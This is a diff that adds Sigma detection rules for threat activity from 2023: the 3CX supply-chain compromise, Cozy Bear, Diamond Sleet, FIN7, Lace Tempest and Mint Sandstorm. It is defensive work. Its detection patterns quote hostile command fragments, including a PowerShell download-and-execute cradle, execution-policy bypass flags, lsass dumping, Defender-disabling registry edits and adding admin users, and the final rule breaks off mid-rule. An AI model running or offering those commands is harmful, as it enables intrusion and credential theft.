Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar +status: experimental +description: Detects execution of known compromised version of 3CXDesktopApp +references: + - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/03/29 +modified: 2023/03/31 +tags: + - attack.defense_evasion + - attack.t1218 + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_hashes_1: + Hashes|contains: + # 3CX Desktop 18.12.407 + - SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC + - SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 + - SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE + - SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859 + - SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187 + - SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA + - MD5=BB915073385DD16A846DFA318AFA3C19 + - MD5=08D79E1FFFA244CC0DC61F7D2036ACA9 + - MD5=4965EDF659753E3C05D800C6C8A23A7A + # 3CX Desktop 18.12.416 + - SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 + - SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 + - SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 + - SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 + - SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB + - SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 + - MD5=9833A4779B69B38E3E51F04E395674C6 + - MD5=704DB9184700481A56E5100FB56496CE + - MD5=8EE6802F085F7A9DF7E0303E65722DC0 + # 3CXDesktopApp MSI + - SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 + - SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 + - SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA + - SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E + - MD5=F3D4144860CA10BA60F7EF4D176CC736 + - MD5=0EEB1C0133EB4D571178B2D9D14CE3E9 + selection_hashes_2: + - sha256: + - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC + - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 + - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE + - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 + - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 + - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 + - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 + - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 + - sha1: + - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 + - 3B43A5D8B83C637D00D769660D01333E88F5A187 + - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA + - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 + - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB + - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 + - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA + - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E + - md5: + - BB915073385DD16A846DFA318AFA3C19 + - 08D79E1FFFA244CC0DC61F7D2036ACA9 + - 4965EDF659753E3C05D800C6C8A23A7A + - 9833A4779B69B38E3E51F04E395674C6 + - 704DB9184700481A56E5100FB56496CE + - 8EE6802F085F7A9DF7E0303E65722DC0 + - F3D4144860CA10BA60F7EF4D176CC736 + - 0EEB1C0133EB4D571178B2D9D14CE3E9 + selection_pe_1: + - OriginalFileName: 3CXDesktopApp.exe + - NewProcessName|endswith: \3CXDesktopApp.exe + - Product: 3CX Desktop App + selection_pe_2: + FileVersion|contains: 18.12. + condition: process_creation and (all of selection_pe_* or 1 of selection_hashes_*) +falsepositives: + - Legitimate usage of 3CXDesktopApp +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml new file mode 100644 index 000000000..6d08d787c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml @@ -0,0 +1,52 @@ +title: Potential Suspicious Child Process Of 3CXDesktopApp +id: 63f3605b-979f-48c2-b7cc-7f90523fed88 +related: + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar +status: experimental +description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise +references: + - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ + - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/03/29 +tags: + - attack.command_and_control + - attack.execution + - attack.t1218 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \3CXDesktopApp.exe + NewProcessName|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml new file mode 100644 index 000000000..2c79aa6a2 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml @@ -0,0 +1,47 @@ +title: Potential Compromised 3CXDesktopApp Update Activity +id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a +related: + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar +status: experimental +description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software +references: + - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/ + - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/03/29 +tags: + - attack.defense_evasion + - attack.t1218 + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - --update + - http + - /electron/update/win32/18.12 + NewProcessName|endswith: \3CXDesktopApp\app\update.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml new file mode 100644 index 000000000..3ca90b2c4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml @@ -0,0 +1,50 @@ +title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor +id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 +related: + - id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142 + type: similar +status: experimental +description: Hunts for known SVR-specific scheduled task names +author: CISA +references: + - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a +date: 2023/12/18 +tags: + - attack.persistence +logsource: + service: security + product: windows +detection: + security: + Channel: Security + selection: + EventID: + - 4698 + - 4699 + - 4702 + TaskName: + - \defender + - \Microsoft\DefenderService + - \Microsoft\Windows\Application Experience\StartupAppTaskCheck + - \Microsoft\Windows\Application Experience\StartupAppTaskCkeck + - \Microsoft\Windows\ATPUpd + - \Microsoft\Windows\Data Integrity Scan\Data Integrity Update + - \Microsoft\Windows\DefenderUPDService + - \Microsoft\Windows\IISUpdateService + - \Microsoft\Windows\Speech\SpeechModelInstallTask + - \Microsoft\Windows\WiMSDFS + - \Microsoft\Windows\Windows Defender\Defender Update Service + - \Microsoft\Windows\Windows Defender\Service Update + - \Microsoft\Windows\Windows Error Reporting\CheckReporting + - \Microsoft\Windows\Windows Error Reporting\SubmitReporting + - \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart + - \Microsoft\Windows\WindowsDefenderService + - \Microsoft\Windows\WindowsDefenderService2 + - \Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck + - \Microsoft\Windows\WindowsUpdate\Scheduled Check + - \WindowUpdate + condition: security and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml new file mode 100644 index 000000000..1ed268e58 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml @@ -0,0 +1,51 @@ +title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler +id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142 +related: + - id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 # Security-Audting Eventlog + type: similar +status: experimental +description: Hunts for known SVR-specific scheduled task names +author: CISA +references: + - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a +date: 2023/12/18 +tags: + - attack.persistence +logsource: + product: windows + service: taskscheduler + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' +detection: + taskscheduler: + Channel: Microsoft-Windows-TaskScheduler/Operational + selection: + EventID: + - 129 # Task Created + - 140 # Task Updated + - 141 # Task Deleted + TaskName: + - \defender + - \Microsoft\DefenderService + - \Microsoft\Windows\Application Experience\StartupAppTaskCheck + - \Microsoft\Windows\Application Experience\StartupAppTaskCkeck + - \Microsoft\Windows\ATPUpd + - \Microsoft\Windows\Data Integrity Scan\Data Integrity Update + - \Microsoft\Windows\DefenderUPDService + - \Microsoft\Windows\IISUpdateService + - \Microsoft\Windows\Speech\SpeechModelInstallTask + - \Microsoft\Windows\WiMSDFS + - \Microsoft\Windows\Windows Defender\Defender Update Service + - \Microsoft\Windows\Windows Defender\Service Update + - \Microsoft\Windows\Windows Error Reporting\CheckReporting + - \Microsoft\Windows\Windows Error Reporting\SubmitReporting + - \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart + - \Microsoft\Windows\WindowsDefenderService + - \Microsoft\Windows\WindowsDefenderService2 + - \Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck + - \Microsoft\Windows\WindowsUpdate\Scheduled Check + - \WindowUpdate + condition: taskscheduler and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml new file mode 100644 index 000000000..c758c8c1a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml @@ -0,0 +1,25 @@ +title: Diamond Sleet APT Process Activity Indicators +id: b5495d8d-24ad-4a44-8caf-ceae9a07a5c2 +status: experimental +description: Detects process creation activity indicators related to Diamond Sleet APT +references: + - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/10/24 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: ' uTYNkfKxHiZrx3KJ' + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml new file mode 100644 index 000000000..e3f0b4f68 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml @@ -0,0 +1,29 @@ +title: Diamond Sleet APT Scheduled Task Creation - Registry +id: 9f9f92ba-5300-43a4-b435-87d1ee571688 +status: experimental +description: | + Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability +references: + - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/10/24 +tags: + - attack.defense_evasion + - attack.t1562 + - detection.emerging_threats +logsource: + product: windows + category: registry_event +detection: + registry_event: + EventID: 4657 + Channel: Security + selection: + ObjectName|contains|all: + - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ + - Windows TeamCity Settings User Interface + condition: registry_event and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml new file mode 100644 index 000000000..bd2d0fd73 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml @@ -0,0 +1,31 @@ +title: Diamond Sleet APT Scheduled Task Creation +id: 3b8e5084-4de9-449a-a40d-0e11014f2e2d +status: experimental +description: | + Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability +references: + - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/10/24 +tags: + - attack.execution + - attack.privilege_escalation + - attack.persistence + - attack.t1053.005 + - detection.emerging_threats +logsource: + product: windows + service: security + definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data. +detection: + security: + Channel: Security + selection: + EventID: 4698 + TaskName: \Windows TeamCity Settings User Interface + TaskContent|contains: uTYNkfKxHiZrx3KJ + condition: security and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml new file mode 100644 index 000000000..42d31a657 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml @@ -0,0 +1,34 @@ +title: Potential APT FIN7 POWERHOLD Execution +id: 71c432c4-e4da-4eab-ba49-e60ea9a81bca +status: test +description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs +references: + - https://labs.withsecure.com/publications/fin7-target-veeam-servers +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/04 +tags: + - attack.execution + - attack.t1059.001 + - attack.g0046 + - detection.emerging_threats +logsource: + product: windows + category: ps_script + definition: bade5735-5ab0-4aa7-a642-a11be0e40872 +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains|all: + - $env:APPDATA + - function MainPayload + - ::WriteAllBytes + - wscript.exe + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml new file mode 100644 index 000000000..57cefdae8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml @@ -0,0 +1,36 @@ +title: Potential POWERTRASH Script Execution +id: 4e19528a-f081-40dd-be09-90c39352bd64 +status: test +description: Detects potential execution of the PowerShell script POWERTRASH +references: + - https://labs.withsecure.com/publications/fin7-target-veeam-servers +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/04 +tags: + - attack.execution + - attack.t1059.001 + - attack.g0046 + - detection.emerging_threats +logsource: + product: windows + category: ps_script + definition: bade5735-5ab0-4aa7-a642-a11be0e40872 +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains|all: + - IO.Compression.DeflateStream + - IO.MemoryStream + - ::FromBase64String + - GetDelegateForFunctionPointer + - .Invoke() + - GlobalAssemblyCache + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml new file mode 100644 index 000000000..180ec761d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml @@ -0,0 +1,34 @@ +title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity +id: 911389c7-5ae3-43ea-bab3-a947ebdeb85e +status: experimental +description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution +references: + - https://labs.withsecure.com/publications/fin7-target-veeam-servers + - https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png + - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/04 +tags: + - attack.execution + - attack.g0046 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains|all: + - -noni -nop -exe bypass -f \\\\ + - ADMIN$ + selection_2: + CommandLine|contains|all: + - -ex bypass -noprof -nolog -nonint -f + - C:\Windows\Temp\ + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml new file mode 100644 index 000000000..59af99f0a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml @@ -0,0 +1,36 @@ +title: Lace Tempest PowerShell Evidence Eraser +id: b377ddab-502d-4519-9e8c-5590033d2d70 +status: experimental +description: | + Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team +references: + - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/11/09 +tags: + - attack.execution + - attack.t1059.001 + - detection.emerging_threats +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains|all: + - cleanLL + - usersfiles.war + - Remove-Item -Path "$tomcat_dir + - SysAidServer + - 'sleep ' + - while(1) + condition: ps_script and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml new file mode 100644 index 000000000..b7c27b5b4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml @@ -0,0 +1,35 @@ +title: Lace Tempest PowerShell Launcher +id: 37dc5463-f7e3-4f61-ad76-ba59cd02a651 +status: experimental +description: | + Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team +references: + - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/11/09 +tags: + - attack.execution + - attack.t1059.001 + - detection.emerging_threats +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains|all: + - \SysAidServer\tomcat\webapps + - Starting user.exe + - \usersfiles\user.exe + - Remove-Item -Force "$wapps + - (Sophos). + condition: ps_script and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml new file mode 100644 index 000000000..c692c3e8c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml @@ -0,0 +1,27 @@ +title: Lace Tempest Cobalt Strike Download +id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d +status: experimental +description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team +references: + - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/11/09 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring( + - /a') + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml new file mode 100644 index 000000000..2ab168f21 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml @@ -0,0 +1,27 @@ +title: Lace Tempest Malware Loader Execution +id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d +status: experimental +description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team +references: + - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/11/09 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + NewProcessName|endswith: :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe + selection_hash: + Hashes|contains: SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml new file mode 100644 index 000000000..090789553 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml @@ -0,0 +1,120 @@ +title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution +id: 91048c0d-5b81-4b85-a099-c9ee4fb87979 +status: test +description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm +references: + - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ +author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +date: 2023/04/20 +modified: 2023/04/25 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent: + ParentProcessName|contains|all: + - aspera + - \ruby + selection_special_child_powershell_img: + NewProcessName|endswith: + - \powershell.exe + - \powershell_ise.exe + selection_special_child_powershell_cli: + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' + selection_special_child_lsass_1: + CommandLine|contains: lsass + selection_special_child_lsass_2: + CommandLine|contains: + - procdump + - tasklist + - findstr + selection_child_wget: + CommandLine|contains: http + NewProcessName|endswith: \wget.exe + selection_child_curl: + CommandLine|contains: http + NewProcessName|endswith: \curl.exe + selection_child_script: + CommandLine|contains: + - E:jscript + - e:vbscript + selection_child_localgroup: + CommandLine|contains|all: + - localgroup Administrators + - /add + selection_child_net: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: + - user + - /add + selection_child_reg: + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa + selection_child_wmic_1: + CommandLine|contains|all: + - wmic + - process call create + selection_child_wmic_2: + CommandLine|contains|all: + - wmic 